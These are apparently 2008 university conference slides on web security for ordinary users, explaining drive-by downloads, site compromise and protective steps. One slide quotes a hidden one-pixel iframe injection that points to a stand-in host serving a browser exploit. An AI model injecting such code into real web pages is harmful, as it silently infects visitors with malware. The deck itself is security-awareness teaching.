Protecting Yourself On-line

Carol Taylor Skye HagenAssistant Professor Asst DirectorComputer Science Office of Information EWU Technology, EWU

1QSI Conference August 26-27, 2008

QSI Conference August 26-27, 2008 2

Overview Security User Responses Motivation Drive-by Downloads

Defining the problemExamplesRecommendations

User Survey

How many people use Anti-virus? Do you keep it up to date? How many people use Spyware programs? Do you use firewall programs?

Windows Firewall, Comodo Firewall Pro (others)

Do you back up the data on your computer?

QSI Conference August 26-27, 2008 3

QSI Conference August 26-27, 2008 4

Motivation

Why should you be concerned with Web security? I only shop at legitimate sites, I don’t ever visit

sites with questionable content Is that enough to keep you safe? That’s not enough to keep you safe in the

current Web environment Surfing regular e-commerce sites can infect

your computer

QSI Conference August 26-27, 2008 5

Motivation

Statistics show that Web security is getting worse ScanSafe reported a 220 % increase in the

amount of Web-based malware over the period between 2007-2008

The volume of backdoor and password-stealing malware blocked by the firm increased by an order of magnitude

855 % between May 2007 to May 2008

QSI Conference August 26-27, 2008 6

Motivation

A website infected with malware is detected every five seconds (2008) That represents a dramatic increase over the

last 12 months Websites poisoned with malware capable of

infecting visitors' machines are being discovered at a rate of 16,173 per day Three times faster than in 2007

http://www.reuters.com/article/pressRelease/idUS120735+23-Jul-2008+BW20080723

More Motivation

Antivirus firm Sophos found that more than

90 % of web pages capable of spreading Trojan horses and spyware are legitimate websites Recent infected websites include those of ITV,

Sony PlayStation, golf page on the BBC site, and a variety of other commercial

Blogspot.com, the blog publishing system owned by Google, was found to be hosting two per cent of the world's web-based malware in June 2008

QSI Conference August 26-27, 2008 7

Motivation Summary

The threats are real!!!! The Internet is an amazing collection of

Entertainment, knowledge, social opportunities and goods but …

The Internet is also a mirror for society Crime, fraud, personal safety and privacy threats

are real, just like in the real world The main difference is that the threats are hidden,

risk is not obvious You must protect yourself from these real dangers

QSI Conference August 26-27, 2008 8

Drive-by Downloads

This attack takes advantage of known vulnerabilities in browsers and operating systems

In a drive by an unsuspecting user (you) downloads and installs software without ever knowing it while they surf the web Can happen when you agree to install browser plugins,

run a Java Applet, or Java Script or launch Active-X applications

However it can also happen without you doing anything There are Web pages modified with code that redirects

visitors to another site infected with malware that can break into your PC, without you even realizing it

QSI Conference August 26-27, 2008 9

Definitions

Active X Control or Active X: A program, developed which can be embedded in a web page or downloaded from a web page and executed from within the browser itself. A browser must support ActiveX controls for this to work

Javascript: A scripting language, based on both Java and C++, used to create code that is commonly embedded into HTML on web pages for enhanced functionality For instance validation of user typed input on a

form10

Definitions

Java Applet: An applet is a small program, usually embedded in a web page, which can perform a number of duties such as playing audio or video clips and querying a database. These programs are normally written in Java

QSI Conference August 26-27, 2008 11

Drive-by Downloads

Unsuspecting users are victimized by simply doing what they do hundreds of times each day Visiting a Web page

Then, while you browse content normally, A computer virus or Trojan horse program is

silently installed

QSI Conference August 26-27, 2008 12

Drive-by Downloads Drive-by downloads are not new, but criminals

have seized on the tactic lately because their success rate with traditional e-mail viruses has tapered off

Avoiding e-mail viruses is not always easy, but more likely as long as you follow clear rules like "don't click on any attachments" But drive-by downloads are much more

sinister No user interaction is generally required

beyond opening an infected site in a Web browser QSI Conference August 26-27, 2008 13

Scope of the Problem

http://googleonlinesecurity.blogspot.com/2008/02/all-your-iframe-are-point-to-us.html

Google crawled billions of Web pages and found … More than 3,000,000 unique URLs on over

180,000 web sites automatically installing malware

14

Graph is % of daily Google queries that contain at least one harmful site in 2007

QSI Conference August 26-27, 2008

Drive-by Downloads

How Web Sites get infected One injection technique, gain access to the Web

Server that hosts the site Attacker injects new content to the compromised

website Typically, injected content is a link that redirects

visitors of these websites to a URL that hosts a script crafted to exploit the browser

To avoid visual detection by website owners, attackers use invisible HTML components

e.g., zero pixel IFRAMEs hide injected content

15QSI Conference August 26-27, 2008

Example of Web Server Compromise – “Italian Job” 2007- Online criminals launched a Web attack that

compromised thousands of legitimate Web sites Infected Web sites contain HTML "iFrame" code

that redirects victim's browser to server that attempts to infect victim's computer

Internet Explorer, Firefox, and Opera are vulnerable

Keyloggers and Trojan downloader program found on compromised PCs so attackers can monitor victim's activity and run other unauthorized programs on the computer

“They can turn your computer into anything they want”

http://www.networkworld.com/news/2007/061907-italian-job-web-attack.html 16

Example of Web Server Compromise – iFrame Example Following code is injected into web pages Size of the in-line frame is 1 pixel by 1 pixel, so it is not visible to the

visitor of the site unless the person looks at the source code:

<iframe src= http://remote.example.com/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe><html>

Above server, remote.example.com index.html file contained JavaScript code that attempted to exploit a recent Internet Explorer vulnerability to download, install, and run a malicious executable on the website visitor's computer

Executable was recognized by about half of anti-virus tools as a spyware trojan

17

Steps for Drive-by Download

18

Browser gets redirected by hidden link, remote.example.com

Downloads and executes hidden malware, from index.html

http://research.google.com/archive/provos-2008a.pdf

QSI Conference August 26-27, 2008

Drive-by Downloads

How Web Sites get infected Another common injection technique

Use websites that allow users to contribute their own content

Postings to forums or blogs User contributed content may be restricted to text but

often can also contain HTML such as links to images or other external content

Adversary can simply inject the exploit URL without the need to compromise the web server

QSI Conference August 26-27, 2008 19

Example of User Contributed Content Compromise - Blog WordPress is the most popular software for

blogs Should use the the current installation of

WordPress (WP) Version 2.5.1 There is an increasing number of blogs, all

with version WP 2.3 and earlier Getting “hit” by the well known iFrame exploit

that infects website visitors with a trojan download

Advice from Marc Liron – Sitebuilder proQSI Conference August 26-27, 2008 20

Example of User Contributed Content Compromise - Blog Author, Marc Liron had trouble loading a site from

well known Internet Marketer, Stu McLaren So, he attempted to access Stu’s blog (June 2008)

http://myideaguy.com/blog/ (DO NOT GO THERE) A few moments after visiting the section:

http://myideaguy.com/blog/category/products/

(DO NOT GO THERE) His installation of Kaspersky Security Suite

ALERTED that a TROJAN infection trying to infect his computer!!!

The culprit was: Trojan-Downloader.HTML.Agent.ishttp://www.marcliron.co.uk/sitebuilditreview/ stu-mclarens-blog-gets-infected-by-hackers

21

Google Flags Malicious Sites

Site has repeated problems http://www.wowstatus.net/

World of Warcraft site Google flagged it as hosting malicious content http://www.google.com/interstitial?url=http://www.wowstatus.net/

One way sites are being flagged to alert you However not all sites are flagged ….

QSI Conference August 26-27, 2008 22

Signs You are Infected

Spyware alerts after you have visited a site See a program pop up that you never loaded

Asks you to do something (don’t do it!) Web browser’s home page changed Browser has new book marks Pop-up window advertisements Unusual files on your computer

QSI Conference August 26-27, 2008 23

How to Protect Yourself

QSI Conference August 26-27, 2008 24

User Behavior

If you think you have been infected, Don’t say yes to anything Close pop-up windows that appear You get an offer to help you clean up your

computer, remove spyware As one researcher put it “I rob you, then I run back and offer to help

identify the culprit that did it” Not too helpful …

QSI Conference August 26-27, 2008 25

Example Problem Pop-UP

QSI Conference August 26-27, 2008 26

If you click "Yes," spyware is installed.

Note the presence of a security certificate is no guarantee that somethingis not spyware.

Protection from Drive-by Downloads Keep Operating system patched and up

to date Turn on automatic updates for OS

Windows XP Settings, Choose Control Panel then

System Open the System Tool Turn on Automatic Updates

QSI Conference August 26-27, 2008 27

Protection from Drive-by Downloads Use the latest browser, Firefox, IE Explorer, Opera Keep browsers patched and up to date

Turn on automated updates for Browser Firefox, current version, 2.0.0.16 and automatic

update is enabled by default But to see the option type, Go to tools > Options > Advanced > Update

IE Explorer is up to version 7 Was an automatic update by MS Use this latest version!!! Has phishing protection built in

28

Protection from Drive-by Downloads Install several programs for removing spyware and

viruses – These are free!!! Adaware SE

http://lavasoft.com/single/trialpay.php Spybot Search and Destroy

http://www.safer-networking.org/en/index.html AVG – virus program

http://free.avg.com/ Avira AntiVir – Another Virus program http://www.free-av.com/ http://www.viewpoints.com/Avira-AntiVir-Personal-Edition-Classic-

review-5ed2029

Protection from Drive-by Downloads Harden your Web browser

Medium security is not good enough Set it to higher

Disable active scripting or have it prompt you If have problems, add sites to an accepted list

QSI Conference August 26-27, 2008 30

Firefox IE7

Open the “Tools” menuSelect “Options”Click “Content”.Click the check box to the left of “Disable JavaScript” so that a tick appears.

Open the “Tools” menu. Select “Internet Options…”, Click the “Security” tab. Click the “Internet” symbol (a globe)Click the “Custom Level…” In the Settings list, scroll down to “Scripting”. Under Active Scripting, click “Disable”

Protection from Drive-by Downloads Another way to protect yourself is by

virtualizing your Web session Using ZoneAlarm’s ForceField The virtualization technology in ForceField forms a

"bubble of security" around the Web browser so that all unknown or unwanted changes from drive-by downloads, are made to a virtualized file system Disappear completely once the user is finished

surfing ForceField's virtualization claims to offer additional

security by protecting the browser session from any malware that might be on the PC

http://www.zonealarm.com/store/content/catalog/products/zonealarm_forcefield.jsp

31

More protection using a free browser toolbar Haute Secure

A company started by Microsoft employees Produce a free toolbar supposed to protect

you from bad web sites Seems to be a good product Can try it and report back

http://hautesecure.com/solutions.aspx

QSI Conference August 26-27, 2008 32

Summary Internet is a scary place Great place to hang out but … Dangerous too Ignore Security? Sure ….

Result is your computer can be used for spam or to commit crime

Your sensitive data can be compromised You will be a victim of theft Your computer may be unusable

Pay some attention, get or buy security software … Security is a process!!!

33

Resources

EWU Security Awareness Site http://www.ewu.edu/securityawarenessSANS Reading Room – lots of technical papers http://www.sans.org/reading_room/Drive-by Download Video http://video.google.com/videoplay?docid=-3351512772400238297&ei=IPK0SLreOZTcqgOWjum9DA&q=Drive+by+download+%2B+watchgaurd&hl=en

StopBadware.org – search for bad websiteshttp://www.stopbadware.org/home/clearinghouse

Re-installing Windows XP – last resort http://www.pcworld.com/article/129977/

how_to_reinstall_windows_xp.html34

35

This presentation can be found at

http://www.ewu.edu/securityawareness

My email: ctaylor4214@comcast.net

Questions